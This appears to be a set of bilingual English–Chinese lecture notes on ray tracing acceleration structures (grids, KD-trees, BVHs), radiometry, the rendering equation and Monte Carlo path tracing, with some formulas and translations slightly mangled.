    • In summary, ray and AABB intersect iff

      综上所述,射线与 AABB 相交,当且仅当

      • $t_{\text{enter}} < t_{\text{exit}}\ &&\ t_{\text{exit}} \ge 0$

    Why Axis-Aligned?

    General

    png

    $$t=\frac{(\mathbf{p}^{\prime}-\mathbf{o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}}$$

    3subtractions, 6multiplies, 1 division

    ​3 次加法,6 次乘法,1 次除法

    Slabs perpendicular to x-axis

    png

    $$t=\frac{\mathbf{p}^{\prime}_x-\mathbf{o}_x}{\mathbf{d}_x}$$

    1subtraction, 1 division

    ​只需要一次加法,一次除法

    Lecture 14: Ray Tracing 2 (Acceleration & Radiometry)

    Announcements

    ​公告

    • GTC news: DLSS 2.0

      图形学前沿

    • GTC news: RTXGI

    • Personal feeling

      个人感受

      • Offline rendering techniques will soon become real-time

        离线渲染技术将很快成为实时技术

      • Current real-time rendering techniques will still be useful

        当前的实时渲染技术仍然有用(光栅化还没有那么快被淘汰)

    Using AABBs to accelerate ray tracing

    Uniform Spatial Partitions (Grids)

    ​统一空间分割(网格)

    Preprocess – Build Acceleration Grid

    ​预处理 - 构建加速网格

    png

    1. Find bounding box

      给所有物体打一个包围盒

    png

    1. Create grid

      给这个包围盒用网格划分成多个小包围盒

    png

    1. Store each object in overlapping cells

      将每个对象存储在重叠的单元格中


    png

    Ray-Scene Intersection

    Step through grid in ray traversal order

    ​按射线遍历顺序逐步穿过网格

    For each grid cell

    ​对于每个网格单元

    ​Test intersection with all objects stored at that cell

    ​测试与存储在该单元格中的所有对象的交集。如果有交集,则检测到物体,再后续计算


    Grid Resolution?

    png

    One cell

    • No speedup

      网格大小的设定是个问题,如果网格太大,相当于没有加速

    png

    Too many cells

    • Inefficiency due to extraneous grid traversal

      无关的网格遍历导致效率低下

    png

    Heuristic:

    启发式:

    • #cells = C * #objs
    • C ≈ 27 in 3D

    网格个数大概为物体的个数的 27 倍比较合适!


    Uniform Grids – When They Work Well

    png

    Grids work well on large collections of objects that are distributed evenly in size and space

    ​网格适用于大小和空间分布均匀的大型对象集合


    Uniform Grids – When They Fail

    ​统一网格–当它们失效时

    png

    “Teapot in a stadium” problem

    ​当各个对象的大小分布和空间分布不均匀时,寄!”体育馆里的茶壶“的问题。

    Spatial Partitions

    Spatial Partitioning Examples

    ​空间划分实例

    png

    Note: you could have these in both 2D and 3D. In lecture we will illustrate principles in 2D.

    ​注意:您可以在二维和三维中使用这些内容。在课程中,我们将说明 2D 的原理。

    ​在计算机图形学中,空间划分是一种常用的技术,用于加速对空间中对象的搜索和查询。它通过将空间划分为更小的区域或单元来减少搜索的复杂度。以下是一些空间划分的示例:

    1. 网格 (Grid):网格将空间划分为规则的网格单元,每个单元可以包含一个或多个对象。这种方法适用于静态场景,可以通过网格索引快速定位对象。
    2. 八叉树 (Oct-Tree):八叉树是三维空间的类似于四叉树的划分方法。它将空间递归地分成八个立方体,每个立方体可以继续分为八个子立方体,以此类推。八叉树通常用于三维图形渲染、体素化等方面。
    3. kd-树 (kd-tree):kd-树是一种多维空间划分方法,它根据数据点在各维度上的分布,递归地将空间划分为轴对齐的超矩形区域。kd-树常用于最近邻搜索等问题。(与八叉树相比,八叉树是一次 $x,y,z$ 轴地划分,kd-树 每次只往一个方向划分,划分次数与维度无关)
    4. 二叉空间分区 (BSP-Tree):与 kd-树相比,它斜着切。(其实没有对齐的好计算)

    KD-Tree Pre-Processing

    png

    ​先给空间 $A$ 竖的来一刀。得到蓝绿两个区域(叶子节点)。

    png

    ​将绿色区域作为 $B$,横的来一刀。得到新的绿和黄色两个叶子节点。

    png

    ​以此类推,一阵乱切。

    Note: also subdivide nodes 1 and 2, etc.

    ​注:还可细分节点 1 和 2 等。只是示意图是这么切的而已。


    Data Structure for KD-Trees

    ​KD 树的数据结构

    Internal nodes store

    内部节点存储

    • split axis: x-, y-, or z-axis

      分割轴:X 轴、Y 轴或 Z 轴

    • split position: coordinate of split plane along axis

      分割位置:分割平面沿轴的坐标

    • children: pointers to child nodes

      子节点:指向子节点的指针

    • No objects are stored in internal nodes

      内部节点中不存储任何对象

    Leaf nodes store

    ​叶节点存储

    • list of objects

      对象列表


    Traversing a KD-Tree

    ​遍历 KD 树

    png

    ​射线穿过 $A$ 时,只需判断射线与各个叶子节点 $1,2,3,4,5$ 的相交关系即可。

    png

    Internal node: split

    ​内部节点:分割

    png

    Assume it’ s leaf node: intersect all objects

    ​假设它是叶节点:与所有叶节点里的所有对象判断相交

    png

    Internal node: split

    ​内部节点:分割

    png

    Leaf node: intersect all objects

    ​遇到相交的叶节点,与所有叶节点里的所有对象判断相交

    png

    Intersection found

    ​找到相交的对象

    ​在计算机图形学领域,Object Partitions 和 Bounding Volume Hierarchy (BVH) 是两种常用的空间分割和组织技术,用于加速场景中对象的渲染和碰撞检测等操作。

    1. Object Partitions: Object Partitions 是一种将场景中的对象按照位置或其他属性进行划分的技术。通常情况下,这种划分是基于空间的,将场景划分为多个区域或单元,每个单元包含一组对象。Object Partitions 技术的目的是通过合理的空间划分,减少需要处理的对象数量,从而提高渲染和碰撞检测等操作的效率。常见的 Object Partitions 技术包括 kd-树、Octree 等。
    2. Bounding Volume Hierarchy (BVH): Bounding volume hierarchy (BVH) 即层次包围体,在 BVH 中,所有的几何物体都会被包在 bounding volume 的叶子节点里面,bounding volume 外面继续包着一个更大的 bounding volume,递归地包裹下去,最终形成的根节点会包裹着整个场景。

    KD-树目前用的比较少,主要是不好划分,而且一个对象有可能被放置在多个叶子节点里,导致重复计算。

    Object Partitions & Bounding Volume Hierarchy (BVH)

    Bounding Volume Hierarchy (BVH)

    png

    ​根节点包含整个场景。

    png

    ​在根节点里套包围盒。

    png

    ​我再套。

    png

    ​我还套!

    png


    Summary: Building BVHs

    • Find bounding box

      查找边界框

    • Recursively split set of objects in two subsets

      递归地将对象集合分成两个子集

    • Recompute the bounding box of the subsets

      重新计算子集的边界框

    • Stop when necessary

      必要时停止

    • Store objects in each leaf node

      在每个叶节点中存储对象


    Building BVHs

    How to subdivide a node?

    ​如何细分节点?

    • Choose a dimension to split

      选择要分割的维度

    • Heuristic #1: Always choose the longest axis in node

      启发式 1: 始终选择节点中最长的轴线

    • Heuristic #2: Split node at location of median object

      启发式 2: 在中位对象的位置分割节点

    Termination criteria?

    ​终止标准?

    • Heuristic: stop when node contains few elements (e.g. 5)

      启发式:当节点包含较少元素(如 5 个)时停止


    Data Structure for BVHs

    Internal nodes store

    ​内部节点存储

    • Bounding box

      边界框

    • Children: pointers to child nodes

      子节点:指向子节点的指针

    Leaf nodes store

    ​叶节点存储

    • Bounding box

      边界框

    • List of objects

      对象列表

    Nodes represent subset of primitives in scene

    ​节点代表场景中基元的子集

    • All objects in subtree

      子树上的所有对象


    BVH Traversal

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    Intersect(Ray ray, BVH node) {
    if (ray misses node.bbox) return;
    if (node is a leaf node)
    test intersection with all objs;
    return closest intersection;
    hit1 = Intersect(ray, node.child1);
    hit2 = Intersect(ray, node.child2);
    return the closer of hit1, hit2;
    }

    ​递归地检测是否相交。


    Spatial vs Object Partitions

    png

    Spatial partition (e.g.KD-tree)

    ​空间分区(如 KD 树)

    • Partition space into non-overlapping regions

      将空间划分为不重叠的区域

    • An object can be contained in multiple regions

      一个对象可包含在多个区域中

    png

    Object partition (e.g. BVH)

    ​对象分区(如 BVH)

    • Partition set of objects into disjoint subsets

      将对象集合划分为互不相交的子集

    • Bounding boxes for each set may overlap in space

      每个子集的边界框可能在空间上重叠

    Basic radiometry (辐射度量学)

    Advertisement: new topics from now on, scarcely covered in other graphics courses

    ​广告:从现在开始,其他图形课程很少涉及的新主题


    Radiometry — Motivation

    png

    Observation

    • In assignment 3, we implement the Blinn-Phong model

      在作业 3 中,我们执行 Blinn-Phong 模型

    • Light intensity $I$ is 10, for example

      例如,光强 $I$ 为 10

    • But 10 what?

      但 10 是什么?连单位都没有

    Do you think Whitted style ray tracing gives you CORRECT results?

    ​你认为怀特风格的光线追踪能得出正确的结果吗?

    All the answers can be found in radiometry

    ​所有答案都可以在辐射测量中找到

    • Also the basics of “Path Tracing”

      还有”路径跟踪“的基础知识


    Radiometry

    ​辐射测量

    Measurement system and units for illumination

    ​照明测量系统和单位

    Accurately measure the spatial properties of light

    ​精确测量光的空间特性

    • New terms: Radiant flux, intensity, irradiance, radiance

      新术语:辐射通量、强度、辐照度、辐射度

    Perform lighting calculations in a physically correct manner

    ​以物理上正确的方式进行照明计算


    My personal way of learning things:

    ​我个人的学习方法:

    • WHY, WHAT, then HOW

      为什么、是什么,然后是怎么做

    Radiant Energy and Flux (Power)

    ​辐射能量和通量(功率)

    Definition: Radiant energy is the energy of electromagnetic radiation. It is measured in units of joules, and denoted by the symbol:

    ​定义:辐射能是电磁辐射的能量。它以焦耳为单位,用符号表示:

    $$Q\mathrm{[J=Joule]}$$

    Definition: Radiant flux (power) is the energy emitted, reflected, transmitted or received, per unit time

    ​定义:辐射通量(功率)是单位时间内发射、反射、传输或接收的能量

    $$\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}\text{ [W = Watt] [lm = lumen]}^\star $$


    Flux – #photons flowing through a sensor in unit time

    ​光通量–单位时间内流经传感器的光子数量

    png


    Important Light Measurements of Interest

    ​重要的相关光测量值

    png

    Light Emitted From A Source
    光源发出的光
    “Radiant Intensity”
    辐射强度

    png

    Light Falling On A Surface
    光落在物体表面
    “Irradiance”
    "辐照度"

    png

    Light Traveling Along A Ray
    光沿着光线行进
    "Radiance"
    “光芒”

    Radiant Intensity

    ​辐射强度

    Definition: The radiant (luminous) intensity is the power per unit solid angle (?) emitted by a point light source.

    ​定义: 辐射(发光)强度是点光源每单位立体角(?)这是个什么玩意

    png

    $I(\omega)\equiv\frac{\mathrm{d}\Phi}{\mathrm{d}\omega}$

    $\left[\frac{\mathrm{W}}{\mathrm{sr}}\right]\left[\frac{\mathrm{lm}}{\mathrm{sr}}=\mathrm{cd}=\mathrm{candela}\right]$

    The candela is one of the seven SI base units.

    ​坎德拉是国际单位制七个基本单位之一。


    Angles and Solid Angles

    png

    Angle: ratio of subtended arc length on circle to radius

    ​平面角:圆上被摄弧长与半径之比

    • $\theta=\frac{l}{r}$

    • Circle has $2\pi$ radians

      圆的弧度为 $2\pi$

    png

    Solid angle: ratio of subtended area on sphere to radius squared

    ​实心角:球面上的入射面积与半径平方的比值

    • $\Omega=\frac{A}{r^2}$

    • Sphere has $4\pi$ steradians


    Differential Solid Angles

    png

    ​这个实体角的求解公式:

    $\begin{aligned}\mathrm{d}A=&(r\mathrm{d}\theta)(r\sin\theta\mathrm{d}\phi)\=&r^2\sin\theta\mathrm{d}\theta\mathrm{d}\phi\end{aligned}$

    $$\mathrm{d}\omega=\frac{\mathrm{d}A}{r^2}=\sin\theta\mathrm{d}\theta\mathrm{d}\phi $$

    **Sphere: **$S^2$

    $\begin{aligned}\Omega&=\int_{S2}\mathrm{d}\omega\&=\int_0{2\pi}\int_0^\pi\sin\theta\mathrm{d}\theta\mathrm{d}\phi\&=4\pi\end{aligned}$


    $\omega$ as a direction vector

    ​将 $\omega$ 作为方向向量

    png

    Will use $\omega$ to denote a direction vector (unit length)

    ​用 $\omega$ 表示方向向量(单位长度)


    Isotropic Point Source

    ​各向同性点源

    png

    $$\begin{aligned}\Phi&=\int_{S^2}I\mathrm{~d}\omega\&=4\pi I\end{aligned}$$

    $$I=\frac\Phi{4\pi}$$


    Modern LED Light

    png

    Output: 815 lumens

    ​输出:815 流明

    (11W LED replacement for 60W incandescent)

    ​(11 瓦 LED 可替代 60 瓦白炽灯)

    Radiant intensity?

    ​辐射强度?

    Assume isotropic:

    ​Intensity = 815 lumens / 4pi sr = 65 candelas

    Lecture 15 Ray Tracing 3 (Light Transport & Global Illumination)

    Reviewing Concepts

    png

    名称公式解释
    Radiant energy 辐射能
    (在 CG 中很少使用)
    $Q[\mathrm{J}=\text {Joule}]$the energy of electromagnetic radiation
    电磁辐射的能量
    Radiant flux (power) 辐射通量(功率)$\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}[\mathrm{W}=\text{Watt}][\mathrm{lm}=\text{lumen}]$Energy per unit time
    单位时间能量
    Radiant intensity 辐射强度$I(\omega)\equiv\frac{\text d\Phi}{\text d\omega}$power per unit solid angle
    单位立体角功率
    Solid Angle 实体角$\Omega=\frac{A}{r^2}$ratio of subtended area on sphere to radius squared
    球面所占面积与半径平方之比

    Irradiance

    辐照度

    Definition: The irradiance is the power per unit area incident on a surface point.

    ​定义:辐照度是照射在表面某一点的每单位面积的功率。

    png

    $$E(\mathrm x)\equiv\frac{\text d\Phi(\mathrm x)}{\mathrm d A}$$

    $$\left[\frac{W}{m2}\right]\left[\frac{\text{lm}}{m2}=\text{lux}\right]$$


    Lambert’ s Cosine Law

    ​兰伯特余弦定理

    Irradiance at surface is proportional to cosine of angle between light direction and surface normal.

    ​表面辐照度与光线方向和表面法线之间的角度的余弦成正比。

    (Note: always use a unit area, the cosine applies on $\Phi$)

    ​(注意:始终使用单位面积,余弦适用于 $\Phi$)

    png

    Top face of cube receives a certain amount of power
    立方体顶面接收一定量的能量
    $E=\frac{\Phi}{A}$

    png

    Top face of 60º rotated cube receives half power
    60º 旋转立方体的顶面接收一半功率
    $E=\frac{1}{2}\frac{\Phi}{A}$

    png

    In general, power per unit area is proportional to $\cos\theta=l\cdot n$
    一般而言,单位面积功率与 $\cos\theta=l\cdot n$ 相关
    $E=\frac{\Phi}{A}\cos\theta$

    Why Do We Have Seasons?

    png

    ​为什么我们会有季节?因为太阳光到地球各个地方的夹角不同。

    Earth’ s axis of rotation: ~23.5° off axis


    Correction: Irradiance Falloff

    ​校正:辐照度衰减

    png

    Assume light is emitting power in a uniform angular distribution

    ​假设光以均匀的角度分布发射功率

    Compare irradiance at surface of two spheres:

    ​比较两个球体表面的辐照度:

    Radiance

    ​辐射

    png

    Radiance is the fundamental field quantity that describes the distribution of light in an environment

    ​辐射度是描述环境中光分布的基本场量

    • Radiance is the quantity associated with a ray

      辐射度是与射线相关的量

    • Rendering is all about computing radiance

      渲染就是计算辐射度

    Definition: The radiance (luminance) is the power emitted, reflected, transmitted or received by a surface, per unit solid angle, per projected unit area.

    ​定义:辐射度(亮度)是表面在单位立体角单位投影面积上发射、反射、透射或接收的功率。

    png

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    $\cos\theta$ accounts for projected surface area

    ​$\cos\theta$ 表示投影表面积

    $$\left[\frac{\mathrm{W}}{\mathrm{sr}\mathrm{m}{2}}\right]\left[\frac{\mathrm{cd}}{\mathrm{m}{2}}=\frac{\mathrm{lm}}{\mathrm{sr}\mathrm{m}^{2}}=\mathrm{nit}\right]$$

    Definition: power per unit solid angle per projected unit area.

    ​定义:单位投影面积单位立体角的功率。

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    Recall

    • Irradiance: power per projected unit area

      辐照度:单位投影面积的功率

    • Intensity: power per solid angle

      强度:单位立体角的功率

    So

    • Radiance: Irradiance per solid angle

      辐射度:单位立体角的辐照度

    • Radiance: Intensity per projected unit area

      辐射度:单位投影面积的强度


    Incident Radiance

    ​入射辐射

    Incident radiance is the irradiance per unit solid angle arriving at the surface.

    ​入射辐射度是到达表面的每单位立体角的辐射度。

    png

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}E(\mathrm{p})}{\mathrm{d}\omega\cos\theta}$$

    i.e. it is the light arriving at the surface along a given ray (point on surface and incident direction).

    ​即,它是沿给定射线(表面上的点和入射方向)到达表面的光。


    Exiting Radiance

    png

    Exiting surface radiance is the intensity per unit projected
    area leaving the surface.

    ​出射表面辐射度是离开表面的每单位投影面积的强度。

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}I(\mathrm{p},\omega)}{\mathrm{d}A\cos\theta}$$

    e.g. for an area light it is the light emitted along a given ray
    (point on surface and exit direction).

    ​例如,对于区域光来说,它是沿给定射线(表面上的点和出射方向)发射的光。


    Irradiance vs. Radiance

    ​辐照度与辐射度

    Irradiance: total power received by area $\text dA$

    ​辐照度:区域 $\text dA$ 接收的总功率

    Radiance: power received by area $\text dA$ from “direction” $\text d\omega$

    ​辐射度:区域 $\text dA$ 从“方向” $\text d\omega$ 接收的功率

    $$\begin{aligned}dE(\mathrm{p},\omega)&=L_i(\mathrm{p},\omega)\cos\theta\mathrm{d}\omega\E(\mathrm{p})&=\int_{H^2}L_i(\mathrm{p},\omega)\cos\theta\mathrm{d}\omega\end{aligned}$$

    png

    Unit Hemisphere 单位半球: $H^2$

    Bidirectional Reflectance Distribution Function (BRDF)

    ​双向反射分布函数 (BRDF)


    Reflection at a Point

    ​点的反射

    Radiance from direction $\omega_i$ turns into the power $E$ that $\text dA$ receives
    Then power $E$ will become the radiance to any other direction $\omega_o$

    ​来自方向 $\omega_i$ 的辐射度变为 $\text dA$ 接收的功率 $E$ 然后功率 $E$ 将成为到任何其他方向 $\omega_o$ 的辐射度

    png

    Differential irradiance incoming 入射光的差异辐照度: $\text dE(\omega_i)=L(\omega_i)cos\theta_i\text d\omega_i$

    Differential radiance exiting (due to $\text d E(\omega_1)$ )差分辐射退出(由于 $\text d E(\omega_1)$ ):$\text d L_r(\omega_r)$


    BRDF

    The Bidirectional Reflectance Distribution Function (BRDF) represents how much light is reflected into each outgoing direction $\omega_r$ from each incoming direction

    ​双向反射分布函数 (BRDF) 表示从每个入射方向反射到每个出射方向 $\omega_r$ 的光量

    png

    $$f_r(\omega_i\to\omega_r)=\frac{\mathrm{d}L_r(\omega_r)}{\mathrm{d}E_i(\omega_i)}=\frac{\mathrm{d}L_r(\omega_r)}{L_i(\omega_i)\cos\theta_i\mathrm{d}\omega_i}\left[\frac{1}{\mathrm{sr}}\right]$$


    The Reflection Equation

    ​反射方程

    png

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$


    Challenge: Recursive Equation

    ​挑战:递归方程

    Reflected radiance depends on incoming radiance

    ​反射辐射取决于入射辐射

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    • $L_r(\mathrm{p},\omega_r)$ reflected radiance 反射辐射
    • $L_{i}(\mathrm{p},\omega_{i})$ incoming radiance 入射辐射

    But incoming radiance depends on reflected radiance (at
    another point in the scene)

    ​但入射辐射取决于反射辐射(在场景中的另一点)


    The Rendering Equation

    ​渲染方程

    Re-write the reflection equation 重写反射方程:

    $$\begin{aligned}L_r(\text{p},\omega_r)=\int_{H^2}f_r(\text{p},\omega_i\to\omega_r)L_i(\text{p},\omega_i)\cos\theta_i\text{d}\omega_i\end{aligned}$$

    by adding an Emission term to make it general!

    ​通过添加发射项使其变得通用!

    The Rendering Equation

    $$\begin{aligned}L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i\end{aligned}$$

    How to solve? Next lecture!

    Note: now, we assume that all directions are pointing outwards!

    注意:现在,我们假设所有方向都指向外面($\Omega^+$)!

    Understanding the rendering equation

    ​理解渲染方程

    png

    ​对于单个点光源:

    $L_r(x,\omega_r)=L_e(x,\omega_r)+L_i(x,\omega_i)f(x,\omega_i,\omega_r)(\omega_i,n)$

    • $L_r(x,\omega_r)$

      Reflected Light (Output Image) 反射光(输出图像)

    • $L_e(x,\omega_r)$

      Emission

      自发光

    • $L_i(x,\omega_i)$

      Incident Light (from light source)

      入射光(来自光源)

    • $f(x,\omega_i,\omega_r)$

      BRDF

    • $(\omega_i,n)$

      Cosine of Incident angle

      入射角余弦

    png

    ​多个点光源,求和。Sum over all light sources.

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\sum L_i(x,\omega_i)\left.f(x,\omega_i,\omega_r)\right.(\omega_i,n)$$

    png

    ​平面光源,使用积分。Replace sum with integral.

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_i(x,\omega_i)f(x,\omega_i,\omega_r)\cos\theta_i\mathrm{d}\omega_i$$

    png

    Surfaces (interreflection)

    ​表面(相互反射)

    png

    png

    ​这是当年那个论文渲染出来的结果。


    Rendering Equation as Integral Equation

    ​将方程渲染为积分方程

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_r(x^{\prime},-\omega_i)f(x,\omega_i,\omega_r)\cos\theta_id\omega_i$$

    ​要是能看到一个物体,要么它自身能发光,要么它能反射出其它光源发出的光。

    Is a Fredholm Integral Equation of second kind [extensively studied numerically] with canonical form

    ​是具有规范形式的第二类 Fredholm 积分方程 [经过广泛的数值研究]

    $$l(u)=e(u)+\int l(v)K(u,v)dv$$

    ​$K(u,v)dv$$ 是 Kernel of equation Light Transport Operator.

    $$L=E+KL$$

    Can be discretized to a simple matrix equation [or system of simultaneous linear equations] ($L$, $E$ are vectors, $K$ is the light transport matrix)

    ​可以离散化为一个简单的矩阵方程[或联立线性方程组]($L$、$E$为向量,$K$为光传输矩阵)


    Ray Tracing and extensions

    ​光线追踪和扩展

    • General class numerical Monte Carlo methods

      通用类数值蒙特卡罗方法

    • Approximate set of all paths of light in scene

      场景中所有光路的近似集

    $$\begin{aligned}L&=E+KL\IL-KL&=E\(I-K)L&=E\L&=(I-K)^{-1}E\end{aligned}$$

    ​在矩阵运算中,$(I-K)^{-1}$ 有类似泰勒公式一样的性质:Binomial Theorem 二项式定理

    $$\begin{aligned}
    L&=(1+K+K2+K3+…)E \
    L&=E+KE+K2E+K3E+…
    \end{aligned}$$

    • $E$

      Emission directly From light sources

      直接从光源发射

    • $KE$

      Direct Illumination on surfaces

      表面直接照明

    • $K^2E$

      Indirect Illumination (One bounce indirect) [Mirrors, Refraction]

      间接照明(一次间接反射)[镜子、折射]

    • $K^3E$

      (Two bounce indirect illum.)

      (两次反射间接照明。)

    如果只取 $L=E+KE$,则我们可以视为 Shading in Rasterization 光栅化中的着色

    png

    ​Direct illumination 不计算反射,背光面将会一片漆黑。

    ​计算的反射越多,画面越真实,也会越亮,但不会无限变亮。


    Probability Review

    Random Variables

    ​随机变量

    $X$ random variable. Represents a distribution of potential values

    ​随机变量。表示潜在值的分布

    $X\sim p(x)$ probability density function (PDF). Describes relative probability of a random process choosing value

    ​概率密度函数(PDF)。描述随机过程选择值的相对概率

    Example: uniform PDF: all values over a domain are equally likely

    ​示例:均匀密度函数:域内的所有值都具有相同的可能性

    png

    ​示例:扔骰子

    $X$ takes on values $1, 2, 3, 4, 5, 6$

    $p(1)=p(2)=p(3)=p(4)=p(5)=p(6)$


    Probabilities

    ​概率

    png

    $n$ discrete values $x_i$ with probability $p_i$

    ​$n$ 个离散值 $x_i$ 具有概率 $p_i$

    Requirements of a probability distribution:

    ​概率分布的要求:

    $p_i\ge 0$

    $\sum^n_{i=1}p_i=1$

    Six-sided die example 六面骰子示例:$p_i=\frac{1}{6}$


    Expected Value of a Random Variable

    ​随机变量的期望值

    The average value that one obtains if repeatedly drawing samples from the random distribution.

    ​从随机分布中反复抽取样本所获得的平均值。

    Expected value of $X$:$E[X]=\sum_{i=1}^{n}x_{i}p_{i}$

    Die example: $\begin{aligned}E[X]&=\sum_{i=1}^n\frac{i}{6}\&=(1+2+3+4+5+6)/6=3.5\end{aligned}$


    Continuous Case: Probability Distribution Function (PDF)

    ​连续情况:概率分布函数 (PDF)

    png

    $$X\sim p(x)$$

    A random variable $X$ that can take any of a continuous set of values, where the relative probability of a particular value is given by a continuous probability density function $p(x)$.

    ​随机变量 $X$ 可以取一组连续的值中的任意一个,其中特定值的相对概率由连续概率密度函数 $p(x)$ 给出。

    Conditions on $p(x)$: $\begin{aligned}p(x)\geq0\ \mathrm{and}\int p(x)\text dx=1\end{aligned}$

    Expected value of $X$: $E[X]=\int xp(x)dx$

    Lecture 16 Ray Tracing 4 (Monte Carlo Path Tracing)

    Monte Carlo Integration

    Why: we want to solve an integral, but it can be too difficult to solve analytically.

    ​原因:我们想解一个积分,但用分析方法(牛顿莱布尼茨公式)解太难了。

    What & How: estimate the integral of a function by averaging random samples of the function’ s value.

    ​内容和方法:通过对函数值的随机样本求平均值来估计函数的积分。

    png

    Let us define the Monte Carlo estimator for the definite integral of given function $f(x)$

    ​让我们为给定函数 $f(x)$ 的定积分定义蒙特卡洛估计量

    Definite integral 定积分:$\int_a^bf(x)dx$

    Random variable 随机变量:$X_i\sim p(x)$

    Monte Carlo estimator 蒙特卡洛估计量:$F_N=\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}$


    Example: Uniform Monte Carlo Estimator

    ​示例:统一蒙特卡罗估计量

    Uniform random variable 对于均匀随机变量:

    png

    png

    $\begin{aligned}&X_i\sim p(x)=C \&\begin{aligned}\int_a^bp(x)dx=1\end{aligned} \&\Rightarrow \begin{aligned}\int_a^bCdx=1\end{aligned} \&\Rightarrow \begin{aligned}C=\frac{1}{b-a}\end{aligned} \end{aligned}$

    Uniform random variable 均匀随机变量:$X_i\sim p(x)=\frac1{b-a}$

    Basic Monte Carlo estimator 基本蒙特卡罗估计量:$F_N=\frac{b-a}N\sum_{i=1}^Nf(X_i)$


    Monte Carlo Integration

    ​蒙特卡罗积分

    $$\begin{aligned}\int f(x)\mathrm{d}x&=\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}\quad&X_i\sim p(x)\end{aligned}$$

    Some notes:

    一些注意事项:

    • The more samples, the less variance.

      样本越多,方差越小。

    • Sample on $x$, integrate on $x$.

      在 $x$ 上采样,在 $x$ 上积分。

    Path Tracing

    ​路径追踪

    Motivation: Whitted-Style Ray Tracing

    ​动机:Whitted 式光线追踪

    Whitted-style ray tracing:

    ​Whitted 式光线追踪:

    • Always perform specular reflections / refractions

      始终执行镜面反射/折射

    • Stop bouncing at diffuse surfaces

      停止在漫反射表面反弹

    Are these simplifications reasonable?

    ​这些简化合理吗?

    High level: let’ s progressively improve upon Whitted-Style Ray Tracing and lead to our path tracing algorithm!

    ​高层次:让我们逐步改进 Whitted 风格的光线追踪并引出我们的路径追踪算法!


    Whitted-Style Ray Tracing: Problem 1

    ​Whitted 式光线追踪:问题 1

    Where should the ray be reflected for glossy materials?

    ​对于光泽材质来说,射线应该在哪里反射?

    png

    ​应为 Glossy reflection,物体接受光和其它物体反射过来的光。


    No reflections between diffuse materials?

    ​漫反射材质之间没有反射吗?

    png

    ​应为右边,物体(如长方体)接受光和其它物体反射(如红墙壁)过来的光。


    Whitted-Style Ray Tracing is Wrong

    ​Whitted 式光线追踪是错误的

    But the rendering equation is correct

    ​但渲染方程是正确的

    $$L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    But it involves

    ​但它涉及

    • Solving an integral over the hemisphere, and

      求解半球上的积分,以及

    • Recursive execution

      递归执行

    How do you solve an integral numerically?

    ​如何用数值方法求解积分?


    A Simple Monte Carlo Solution

    ​简单的蒙特卡罗解决方案

    Suppose we want to render one pixel (point) in the following scene for direct illumination only

    ​假设我们想在以下场景中渲染一个像素(点),仅用于直接照明

    Note: this is an area light

    png

    Abuse the concept of Reflection Equation a little bit

    ​稍微滥用一下反射方程的概念

    $$L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    (again, we assume all directions are pointing outwards)

    ​(再次假设所有方向都指向外面)

    Fancy as it is, it’ s still just an integration over directions

    ​尽管很花哨,但它仍然只是对方向的整合

    png

    So, of course we can solve it using Monte Carlo integration!

    ​因此,我们当然可以使用蒙特卡洛积分来解决这个问题!

    We want to compute the radiance at $p$ towards the camera

    ​我们想要计算 $p$ 处朝向相机的辐射度

    $$\begin{aligned}L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm d\omega_i\end{aligned}$$

    Monte Carlo integration:

    ​蒙特卡洛积分:

    $$\int_abf(x)\mathrm{d}x\approx\frac1N\sum_{k=1}N\frac{f(X_k)}{p(X_k)}\quad X_k\sim p(x)$$

    What’ s our “$f(x)$”?

    $$L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$$

    What’ s our pdf?

    $$p(\omega_i)=1/2\pi$$

    (assume uniformly sampling the hemisphere)

    ​(假设对半球进行均匀采样)

    So, in general

    $$\begin{aligned}
    L_o(p,\omega_o)& \begin{aligned}=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm d\omega_i\end{aligned} \
    &\approx\frac1N\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}
    \end{aligned}$$

    (note: abuse notation a little bit for $i$)

    ​(注意:对 $i$ 的符号有点滥用)

    What does it mean?

    ​这是什么意思?

    A correct shading algorithm for direct illumination!

    ​直接照明的正确着色算法!

    $$L_o(p,\omega_o)\approx\frac{1}{N}\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}$$


    shade(p, wo)

    ​Randomly choose N directions wi~pdf

